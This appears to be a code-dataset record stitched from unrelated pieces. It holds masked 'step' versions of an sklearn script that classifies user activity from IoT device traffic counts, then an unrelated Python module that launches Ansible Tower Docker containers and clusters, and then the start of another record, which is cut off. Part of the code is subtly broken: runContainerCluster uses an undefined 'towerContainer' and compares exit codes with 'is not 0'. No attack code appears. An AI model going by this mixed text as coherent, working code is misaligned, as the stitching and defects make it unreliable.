evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_7(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=7,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef passiveAggressiveClassifier(X_train, y_train):\n model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=\n 0.001, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_2(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=2,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_7(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=7,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef passiveAggressiveClassifier(X_train, y_train):\n model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=\n 0.001, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5,\n 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n evaluation_path = (\n 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/')\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n<mask token>\n",
"step-5": "import glob\nimport csv\nimport math\n\nimport pandas\n\n# this is used to train the model, try different model, generate the csv file of the result\n\nimport pandas\nimport pandas as pd\nimport pickle\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nfrom sklearn import datasets\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport csv\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.linear_model import RidgeClassifierCV\nimport attr\n# from pycm import *\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import matthews_corrcoef\nfrom sklearn.metrics import cohen_kappa_score\nfrom sklearn import tree\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\n\n\n# evaluation_path = '/aul/homes/qli027/projects/RNN/evaluation/random/'\n# # activity = ['work','go_back_home','baby_present','entertainment','smoke','alexa','others','print','check_body_condition']\n# for i in range (0,9):\n# with open(evaluation_path + str(i) +'.csv', 'w') as new:\n# realnames = ['model','TP','FN','TN','FP']\n# writer = csv.DictWriter(new, fieldnames = realnames)\n# writer.writeheader()\n# new.close()\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_2(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=2, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_6(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=6, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_7(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=7, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8, random_state=0)\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef passiveAggressiveClassifier(X_train, y_train):\n model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=1e-3, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1], class_weight='balanced')\n model = model.fit(X_train, y_train)\n return (model)\n\n\ndef evaluation_result(y_test, y_pred, model):\n cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])\n print(cnf_matrix)\n\n FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)\n FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)\n TP = np.diag(cnf_matrix)\n TN = cnf_matrix.sum() - (FP + FN + TP)\n\n FP = FP.astype(int)\n FN = FN.astype(int)\n TP = TP.astype(int)\n TN = TN.astype(int)\n print(TP, TN, FP, FN)\n\n evaluation_path = 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/'\n for i in range(0, 13):\n with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])\n csvfile.close()\n\n\n#\n\n\ndata = pd.read_csv(\"C:/penv/unsw/csvfiles/labeled/count/useractivity/new.csv\")\ndata = data.dropna()\n\nfeature_cols = ['Size', 'Amazon Echo', 'Belkin Motion',\n 'Belkin Switch', 'Blipcare BloodPressure Meter', 'HP Printer', 'Dropcam', 'Insteon Camera',\n 'LIFX Smart Bulb', 'NEST Smoke Alarm', 'Netatmo Welcome Camera', 'Netatmo Weather Station',\n 'PIX-STAR Photo-frame', 'Samsung SmartCam', 'Smart Things', 'TP-Link Day Night Cloud camera',\n 'TP-Link Smart plug', 'Triby Speaker', 'Withings Smart Baby Monitor', 'Withings Smart scale',\n 'Withings Aura smart sleep sensor', 'iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',\n 'Laptop', 'MacBook', 'Android Phone 2', 'iPhone', 'MacBook/iPhone']\n# feature_cols = [ 'Amazon Echo', 'Belkin Motion',\n# 'Belkin Switch','Blipcare BloodPressure Meter','HP Printer','Dropcam','Insteon Camera',\n# 'LIFX Smart Bulb', 'NEST Smoke Alarm','Netatmo Welcome Camera', 'Netatmo Weather Station',\n# 'PIX-STAR Photo-frame','Samsung SmartCam','Smart Things', 'TP-Link Day Night Cloud camera',\n# 'TP-Link Smart plug','Triby Speaker','Withings Smart Baby Monitor','Withings Smart scale',\n# 'Withings Aura smart sleep sensor','iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',\n# 'Laptop', 'MacBook', 'Android Phone 2','iPhone','MacBookiPhone']\n# feature_cols = ['Size']\nX = data[feature_cols]\nscaler = StandardScaler()\nX = scaler.fit_transform(X) # Features\ny = data['User Activity'] # Target variable\n\n# instantiate the model (using the default parameters)\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n# d = [decisionTree, logisticRegression,knn, svm_linear, svm_2,svm_3,svm_rbf,ridgeClassifierCV,naiveBayes,cnn_3layers,random_forest]\nmodel = decisionTree(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'decisionTree')\n\nmodel = logisticRegression(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'logisticRegression')\n\nmodel = knn(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'knn')\n\nmodel = svm_linear(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_linear')\n\nmodel = svm_2(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_2')\n\nmodel = svm_3(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_3')\n\nmodel = svm_rbf(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'svm_rbf')\n\nmodel = naiveBayes(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'naiveBayes')\n\nmodel = random_forest(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'random_forest')\n\nmodel = ridgeClassifierCV(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'ridgeClassifierCV')\n\nmodel = passiveAggressiveClassifier(X_train, y_train)\ny_pred = model.predict(X_test)\nevaluation_result(y_test, y_pred, 'passiveAggressiveClassifier')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
13,
14,
16,
17,
21
]
}
|
[
13,
14,
16,
17,
21
] |
#!/usr/bin/env python3
''' towerdev - Ansible Tower Testing Framework
MIT License
Copyright © 2021 falcon78921
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import towerdev.common
import towerdev.utilities
from colors import *
# Invoke dockerClient()
dockerClient = towerdev.common.dockerClient()
def runContainer(purpose, externalPort, osVersion, containerName, debug=True, **kwargs):
"""Run supplemental container from pre-existing image"""
# Optional debug that prints a dict of options
if debug == True:
runSpecialOpts = dict(purpose=purpose, externalPort=externalPort, osVersion=osVersion, containerName=containerName)
print(runSpecialOpts)
# Determines what we do based on purpose
if purpose == "ssh":
if osVersion == "centos7":
sshContainer = dockerClient.containers.run('centos7/systemd', privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'22/tcp':externalPort})
elif osVersion == "centos8":
sshContainer = dockerClient.containers.run('centos8/systemd', privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'22/tcp':externalPort})
containersList = dockerClient.containers.list(filters={'name': containerName})
if len(containersList) == 1:
creationStatus = True
else:
creationStatus = False
return creationStatus
def runContainerCluster(towerVersion, osVersion, namingConvention, stream=True, **kwargs):
"""Run Tower containers in a clustered setup"""
# runContainerCluster() defaults; can be overriden via **kwargs
externalPort = None
containerCount = 3
debug = True
loadBalance = False
# Optional debug that prints a dict of options
if debug:
runClusterOpts = dict(towerVersion=towerVersion, osVersion=osVersion, loadBalance=loadBalance, namingConvention=namingConvention, externalPort=externalPort, containerCount=containerCount, debug=debug)
print(runClusterOpts)
# Check to see if specified towerVersion has image built
check = towerdev.utilities.imageCheck(towerVersion)
# How we proceed with imageCheck() return
if check is False:
print(color("ERROR: Deployment of container cluster failed. Please make sure the specified version of Tower has an image built.", fg="red"))
return False
else:
for c in range(containerCount):
runTowerContainer(towerVersion=towerVersion, externalPort=externalPort, osVersion=osVersion, containerName="{0}-{1}".format(namingConvention,c))
clusterContainers = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})
containerIps = []
# Gather container IPs for inventory fillout
for c in range(len(clusterContainers)):
containerIp = clusterContainers[c].attrs['NetworkSettings']['IPAddress']
containerIps.append(containerIp)
print(clusterContainers[0])
# Choose inventory file based on towerVersion
if "3.5" in towerVersion:
chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.5.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)
elif "3.6" in towerVersion:
chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.6.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)
elif "3.7" in towerVersion:
chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.7.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)
elif "3.8" in towerVersion:
chooseInventoryCmd = 'mv /opt/ansible-tower-setup-{0}-1/cluster_inventory_3.8.x /opt/ansible-tower-setup-{0}-1/inventory'.format(towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=chooseInventoryCmd)
# Choose messaging backend based on towerVersion
if "3.5" in towerVersion:
for i in containerIps:
modifyInventoryCmd = 'sed -i "2i{0} rabbitmq_host={0}" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)
elif "3.6" in towerVersion:
for i in containerIps:
modifyInventoryCmd = 'sed -i "2i{0} rabbitmq_host={0}" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)
elif "3.7" in towerVersion:
for i in containerIps:
modifyInventoryCmd = 'sed -i "2i{0} routable_hostname={0}" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)
elif "3.8" in towerVersion:
for i in containerIps:
modifyInventoryCmd = 'sed -i "2i{0} routable_hostname={0}" /opt/ansible-tower-setup-{1}-1/inventory'.format(i, towerVersion)
runInventoryCmd = clusterContainers[0].exec_run(cmd=modifyInventoryCmd)
# Call ./setup.sh from first container in list
setupCmd = '/bin/bash -c "cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh"'.format(towerVersion)
setupLbCmd = '/bin/bash -c "cd /opt/ansible-tower-setup-{0}-1 && ./setup.sh -e nginx_disable_https=true"'.format(towerVersion)
inventoryDbVersion = towerVersion.replace(".", "")
modifyInventoryDbCmd = "sed -i 's/XXX/{0}/g' /opt/ansible-tower-setup-{1}-1/inventory".format(inventoryDbVersion, towerVersion)
runDatabaseCmd = clusterContainers[0].exec_run(cmd=modifyInventoryDbCmd)
if loadBalance:
print(color("INFO: Running ./setup.sh with load balance configuration...", fg="yellow"))
# Stream output based on option
if stream:
lowLevelClient = towerdev.common.apiClient()
calcRunContainer = len(clusterContainers) - 1
createExec = lowLevelClient.exec_create(container="{0}-{1}".format(namingConvention, calcRunContainer), cmd=setupLbCmd)
runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False)
for line in runSetupCmd:
print(line.decode('utf-8'))
inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])
setupCmdCode = inspect['ExitCode']
containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})
if len(containersList) == containerCount:
clusterStatus = True
else:
clusterStatus = False
if setupCmdCode is not 0:
clusterStatus = False
else:
runSetupCmd = towerContainer.exec_run(cmd=setupLbCmd)
else:
print(color("INFO: Running ./setup.sh with no load balance configuration...", fg="yellow"))
# Stream output based on option
if stream:
lowLevelClient = towerdev.common.apiClient()
calcRunContainer = len(clusterContainers) - 1
createExec = lowLevelClient.exec_create(container="{0}-{1}".format(namingConvention, calcRunContainer), cmd=setupCmd)
runSetupCmd = lowLevelClient.exec_start(exec_id=createExec['Id'], stream=True, detach=False)
for line in runSetupCmd:
print(line.decode('utf-8'))
inspect = lowLevelClient.exec_inspect(exec_id=createExec['Id'])
setupCmdCode = inspect['ExitCode']
containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})
if len(containersList) == containerCount:
clusterStatus = True
else:
clusterStatus = False
if setupCmdCode is not 0:
clusterStatus = False
else:
runSetupCmd = towerContainer.exec_run(cmd=setupCmd)
containersList = dockerClient.containers.list(filters={'name': '{0}-*'.format(namingConvention)})
if len(containersList) == containerCount:
clusterStatus = True
else:
clusterStatus = False
if runSetupCmd[0] is not 0:
clusterStatus = False
return clusterStatus
def runTowerContainer(towerVersion, externalPort, osVersion, containerName, debug=False, **kwargs):
"""Runs Tower container from pre-existing image"""
allowedMemory = None
# Optional debug that prints a dict of options
if debug == True:
runOpts = dict(towerVersion=towerVersion, externalPort=externalPort, osVersion=osVersion, containerName=containerName)
print(runOpts)
# Determines what we do based on externalPort input
if not externalPort:
if allowedMemory is not None:
towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, mem_limit=allowedMemory, ports={'443/tcp':None})
else:
towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'443/tcp':None})
else:
if allowedMemory is not None:
towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, mem_limit=allowedMemory, ports={'443/tcp':externalPort})
else:
towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'.format(osVersion, towerVersion), privileged=False, volumes={'/sys/fs/cgroup': {'bind':'/sys/fs/cgroup', 'mode':'ro'}}, tmpfs={'/tmp':'exec', '/run':''}, detach=True, name=containerName, ports={'443/tcp':externalPort})
containersList = dockerClient.containers.list(filters={'name': containerName})
if len(containersList) == 1:
creationStatus = True
else:
creationStatus = False
return creationStatus
|
normal
|
{
"blob_id": "63e28e6a1ea5db1d1c41bbc755b9c33905e066bb",
"index": 9832,
"step-1": "<mask token>\n\n\ndef runTowerContainer(towerVersion, externalPort, osVersion, containerName,\n debug=False, **kwargs):\n \"\"\"Runs Tower container from pre-existing image\"\"\"\n allowedMemory = None\n if debug == True:\n runOpts = dict(towerVersion=towerVersion, externalPort=externalPort,\n osVersion=osVersion, containerName=containerName)\n print(runOpts)\n if not externalPort:\n if allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp': None}\n )\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes\n ={'/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'\n }}, tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, ports={'443/tcp': None})\n elif allowedMemory is not None:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n .format(osVersion, towerVersion), privileged=False, volumes={\n '/sys/fs/cgroup': {'bind': '/sys/fs/cgroup', 'mode': 'ro'}},\n tmpfs={'/tmp': 'exec', '/run': ''}, detach=True, name=\n containerName, mem_limit=allowedMemory, ports={'443/tcp':\n externalPort})\n else:\n towerContainer = dockerClient.containers.run('ansibletower/{0}:{1}'\n 